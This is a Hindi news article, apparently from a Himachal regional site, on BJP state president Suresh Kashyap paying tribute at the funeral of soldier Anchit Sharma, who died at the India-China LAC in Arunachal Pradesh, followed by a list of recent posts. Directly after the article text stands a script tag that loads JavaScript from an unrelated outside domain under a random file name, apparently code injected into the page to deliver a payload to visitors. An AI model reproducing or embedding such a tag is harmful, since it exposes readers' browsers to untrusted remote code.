Categories: हिमाचल

पंचतत्व में विलीन हुए शहीद अंचित शर्मा, बीजेपी प्रदेश अध्यक्ष ने दी श्रद्धाजंलि

<p>भाजपा के प्रदेश अध्यक्ष एवं सांसद सुरेश कश्यप शहीद अंचित शर्मा के अंतिम दर्शन के लिए आज उनके पैतृक गांव धार पजेरा, पच्छाद पहुंचे। सांसद सुरेश कश्यप ने शहीद अंकित शर्मा को भावभीनि श्रद्धांजलि अर्पित की। 22 वर्षीय शहीद अंचित शर्मा जो कि 21 डोगरा यूनिट के जवान थे। 24 नवंबर को अरुणाचल प्रदेश में भारत-चीन एलएसी पर&nbsp; 5:45 बजे शहीद हो गए। यह हिमाचल प्रदेश विशेषकर जिला सिरमौर और पच्छाद लिए अति दुःखद क्षण है। उनका यह बलिदान व्यर्थ नहीं जाएगा और हिमाचल प्रदेश के इस वीर सपूत को प्रदेश हमेशा स्मरण करेगा।</p>

<p>भाजपा अध्यक्ष ने शहीद अंचित शर्मा के दादा-दादी, पिता राजेश शर्मा, माता सुनीता शर्मा, बहन गीतिका शर्मा को इस दुख की घड़ी में सांत्वना भी प्रदान की। आज सुबह शहीद अंचित शर्मा का पार्थिव शरीर राजगढ़ पहुंचा। उनके अंतिम दर्शन के लिए लोगों का हुजूम उमड़ पड़ा औऱ पूरा राजगढ़ भारत माता की जय, अंचित शर्मा अमर रहे एवं वंदे मातरम से गूंज उठा। पच्छाद के इस वीर सपूत की शहादत पर सभी हिन्दुस्तानियों को हमेशा गर्व रहेगा।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

बाहर से आने वाले ऐशगाह न बनाएं हिमाचल को: राज्यपाल

  Shimla: शिमला के संजौली मस्जिद विवाद के बाद हिमाचल प्रदेश में गरमाए सियासी माहौल…

20 mins ago

हिमाचल में चलेगा योगी मॉडल, हर भोजनालय पर पहचान पत्र लगाना अनिवार्य

  Shimla:योगी माडल को हिमाचल अपनाने जा रहा है। यूपी की तर्ज पर हर भोजनालय,…

38 mins ago

आपसी रंजिश में चली गोलियां, एक गंभीर, भड़के ग्रामीणों ने किरतपुर-नेरचौक फोरलेन किया जाम

  Bilaspur: उपमंडल श्री नयना देवी जी के बैहल में आपसी रंजिश के चलते हुए…

51 mins ago

ए. शैनामोल मंडी की नई मंडलायुक्त, संदीप कदम को शिमला की जिम्मेदारी

पांच आईएएस अधिकारियों के तबादला और नियुक्ति आदेश क्लिक करें और पढें पूरी सूची Shimla:…

5 hours ago

HP Board परीक्षाओं में 50% प्रश्न होंगे योग्यता आधारित, जानें नई व्यवस्था

  धर्मशाला। हिमाचल प्रदेश स्कूल शिक्षा बोर्ड परीक्षाओं के पैटर्न में बड़े बदलाव की तैयारी…

6 hours ago

Mandi: पति को कुंए में डूबा देख पत्‍नी ने भी लगाई छलांग, दोनों की दर्दनाक मौत

मंडी के रखोह के कलोह गांव की घटना मृतक वार्ड पंच और पत्‍नी थी आशा…

7 hours ago